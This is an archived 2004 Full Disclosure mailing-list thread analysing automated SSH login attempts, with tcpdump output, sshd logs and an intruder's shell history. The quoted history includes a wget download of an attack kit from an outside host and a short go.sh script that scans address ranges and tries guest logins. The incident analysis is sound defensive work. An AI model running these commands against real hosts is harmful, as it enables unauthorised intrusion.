Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: Re: Automated SSH login attempts?
From: Andrei Galca-Vasiliu <andrei () fq ro>
Date: Thu, 29 Jul 2004 22:44:20 +0300

I've tested the exploit on my Slack 10 box, OpenSSH_3.8.1p1, from my machine.
The tcpdump output follows:

tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
22:38:56.177625 IP (tos 0x0, ttl  61, id 64319, offset 0, flags [DF], length: 
60) 82.77.45.170.35528 > 213.157.171.49.22: S [tcp sum ok] 49755694:49755694
(0) win 5728 <mss 1432,sackOK,timestamp 272157969 0,nop,wscale 0>
22:38:56.190058 IP (tos 0x0, ttl  61, id 64320, offset 0, flags [DF], length: 
52) 82.77.45.170.35528 > 213.157.171.49.22: . [tcp sum ok] 1:1(0) ack 1 win 
5728 <nop,nop,timestamp 272157985 647644964>
22:38:56.239677 IP (tos 0x0, ttl  61, id 64321, offset 0, flags [DF], length: 
52) 82.77.45.170.35528 > 213.157.171.49.22: . [tcp sum ok] 1:1(0) ack 26 win 
5728 <nop,nop,timestamp 272158015 647644979>
22:38:56.239897 IP (tos 0x0, ttl  61, id 64322, offset 0, flags [DF], length: 
72) 82.77.45.170.35528 > 213.157.171.49.22: P [tcp sum ok] 1:21(20) ack 26 
win 5728 <nop,nop,timestamp 272158015 647644979>
22:38:56.295474 IP (tos 0x0, ttl  61, id 64323, offset 0, flags [DF], length: 
204) 82.77.45.170.35528 > 213.157.171.49.22: P 21:173(152) ack 634 win 6688 
<nop,nop,timestamp 272158084 647645031>
22:38:56.347138 IP (tos 0x0, ttl  61, id 64324, offset 0, flags [DF], length: 
196) 82.77.45.170.35528 > 213.157.171.49.22: P 173:317(144) ack 634 win 6688 
<nop,nop,timestamp 272158136 647645122>
22:38:56.419528 IP (tos 0x0, ttl  61, id 64325, offset 0, flags [DF], length: 
68) 82.77.45.170.35528 > 213.157.171.49.22: P [tcp sum ok] 317:333(16) ack 
1098 win 7904 <nop,nop,timestamp 272158209 647645166>
22:38:56.476041 IP (tos 0x0, ttl  61, id 64326, offset 0, flags [DF], length: 
104) 82.77.45.170.35528 > 213.157.171.49.22: P 333:385(52) ack 1098 win 7904 
<nop,nop,timestamp 272158264 647645246>
22:38:56.490631 IP (tos 0x0, ttl  61, id 64327, offset 0, flags [DF], length: 
136) 82.77.45.170.35528 > 213.157.171.49.22: P 385:469(84) ack 1150 win 7904 
<nop,nop,timestamp 272158278 647645263>
22:38:56.506077 IP (tos 0x0, ttl  61, id 64328, offset 0, flags [DF], length: 
104) 82.77.45.170.35528 > 213.157.171.49.22: P 469:521(52) ack 1234 win 7904 
<nop,nop,timestamp 272158302 647645285>
22:38:56.506232 IP (tos 0x0, ttl  61, id 64329, offset 0, flags [DF], length: 
52) 82.77.45.170.35528 > 213.157.171.49.22: F [tcp sum ok] 521:521(0) ack 
1234 win 7904 <nop,nop,timestamp 272158302 647645285>
22:38:56.511642 IP (tos 0x0, ttl  61, id 62364, offset 0, flags [DF], length: 
60) 82.77.45.170.35529 > 213.157.171.49.22: S [tcp sum ok] 53755391:53755391
(0) win 5728 <mss 1432,sackOK,timestamp 272158307 0,nop,wscale 0>
22:38:56.525150 IP (tos 0x0, ttl  61, id 64330, offset 0, flags [DF], length: 
52) 82.77.45.170.35528 > 213.157.171.49.22: . [tcp sum ok] 522:522(0) ack 
1235 win 7904 <nop,nop,timestamp 272158310 647645295>
22:38:56.528352 IP (tos 0x0, ttl  61, id 62365, offset 0, flags [DF], length: 
52) 82.77.45.170.35529 > 213.157.171.49.22: . [tcp sum ok] 1:1(0) ack 1 win 
5728 <nop,nop,timestamp 272158324 647645298>
22:38:56.538958 IP (tos 0x0, ttl  61, id 62366, offset 0, flags [DF], length: 
52) 82.77.45.170.35529 > 213.157.171.49.22: . [tcp sum ok] 1:1(0) ack 26 win 
5728 <nop,nop,timestamp 272158333 647645317>
22:38:56.539178 IP (tos 0x0, ttl  61, id 62367, offset 0, flags [DF], length: 
72) 82.77.45.170.35529 > 213.157.171.49.22: P [tcp sum ok] 1:21(20) ack 26 
win 5728 <nop,nop,timestamp 272158333 647645317>
22:38:56.584001 IP (tos 0x0, ttl  61, id 62368, offset 0, flags [DF], length: 
204) 82.77.45.170.35529 > 213.157.171.49.22: P 21:173(152) ack 634 win 6688 
<nop,nop,timestamp 272158363 647645329>
22:38:56.661544 IP (tos 0x0, ttl  61, id 62369, offset 0, flags [DF], length: 
196) 82.77.45.170.35529 > 213.157.171.49.22: P 173:317(144) ack 634 win 6688 
<nop,nop,timestamp 272158452 647645411>
22:38:56.744357 IP (tos 0x0, ttl  61, id 62370, offset 0, flags [DF], length: 
68) 82.77.45.170.35529 > 213.157.171.49.22: P [tcp sum ok] 317:333(16) ack 
1098 win 7904 <nop,nop,timestamp 272158504 647645479>
22:38:56.799022 IP (tos 0x0, ttl  61, id 62371, offset 0, flags [DF], length: 
104) 82.77.45.170.35529 > 213.157.171.49.22: P 333:385(52) ack 1098 win 7904 
<nop,nop,timestamp 272158592 647645571>
22:38:56.811454 IP (tos 0x0, ttl  61, id 62372, offset 0, flags [DF], length: 
136) 82.77.45.170.35529 > 213.157.171.49.22: P 385:469(84) ack 1150 win 7904 
<nop,nop,timestamp 272158601 647645586>
22:38:56.832211 IP (tos 0x0, ttl  61, id 62373, offset 0, flags [DF], length: 
104) 82.77.45.170.35529 > 213.157.171.49.22: P 469:521(52) ack 1234 win 7904 
<nop,nop,timestamp 272158623 647645606>
22:38:56.832365 IP (tos 0x0, ttl  61, id 62374, offset 0, flags [DF], length: 
52) 82.77.45.170.35529 > 213.157.171.49.22: F [tcp sum ok] 521:521(0) ack 
1234 win 7904 <nop,nop,timestamp 272158623 647645606>
22:38:56.850483 IP (tos 0x0, ttl  61, id 62375, offset 0, flags [DF], length: 
52) 82.77.45.170.35529 > 213.157.171.49.22: . [tcp sum ok] 522:522(0) ack 
1235 win 7904 <nop,nop,timestamp 272158638 647645621>

And this is the syslog entry:

Jul 29 22:38:56 master sshd[29520]: Illegal user test from 82.77.45.170
Jul 29 22:38:56 master sshd[29520]: Failed password for illegal user test from 
82.77.45.170 port 35528 ssh2
Jul 29 22:38:56 master sshd[29522]: Illegal user guest from 82.77.45.170
Jul 29 22:38:56 master sshd[29522]: Failed password for illegal user guest 
from 82.77.45.170 port 35529 ssh2

Can anyone figure it out?

Intr-un mail de pe data de Thursday 29 July 2004 19:38, Stefan Janecek 
povestea:
Hmmm - I have also been getting those login attemps, but thought them to
be harmless. Maybe they are not *that* harmless, though... Today I
managed to get my hands on a machine that was originating such login
attempts. I must admit I am far from being a linux security expert, but
this is what I've found out up to now:

Whoever broke into the machine did not take any attempts to cover up his
tracks - this is what I found in /root/.bash_history:

------
id
uname -a
w
id
ls
wgte frauder.us/linux/ssh.tgz
wget frauder.us/linux/ssh.tgz
tar xzvf ssh.tgz
tar xvf ssh.tgz
ls
cd ssh
ls
./go.sh 195.178
ls
pico uniq.txt
vi uniq.txt
ls
rm -rf uniq.txt
./go.sh 167.205
ls
rm -rf uniq.txt  vuln.txt
./go.sh 202.148.20
./go.sh 212.92
./go.sh 195.197
./go.sh 147.32
./go.sh 213.168
./go.sh 134.176
./go.sh 195.83
------

um-hum. I downloaded 'ssh.tgz', it contains the script go.sh and two
binaries:

go.sh:
-------
./ss 22 -b $1 -i eth0 -s 6
cat bios.txt |sort | uniq > uniq.txt
./sshf
-------

* 'ss' apparently is some sort of portscanner
* 'sshf' connects to every IP in uniq.txt and tries to log in as user
'test' first, then as user 'guest' (according to tcpdump).

This does not seem to be a stupid brute force attack, as there is only
one login attempt per user. Could it be that the tool tries to exploit
some vulnerability in the sshd, and just tries to look harmless by using
'test' and 'guest' as usernames?

The compromised machine was running an old debian woody installation
which had not been upgraded for at least one year, the sshd version
string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10'

As already mentioned, I am far from being an expert, but if I can assist
in further testing, then let me know. Please CC me, I am not subscribed
to the list.

cheers,
Stefan






_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

-- 
*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.

Andrei Galca-Vasiliu
Folio Q Advertising
www.fq.ro

Security is an illusion...

*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault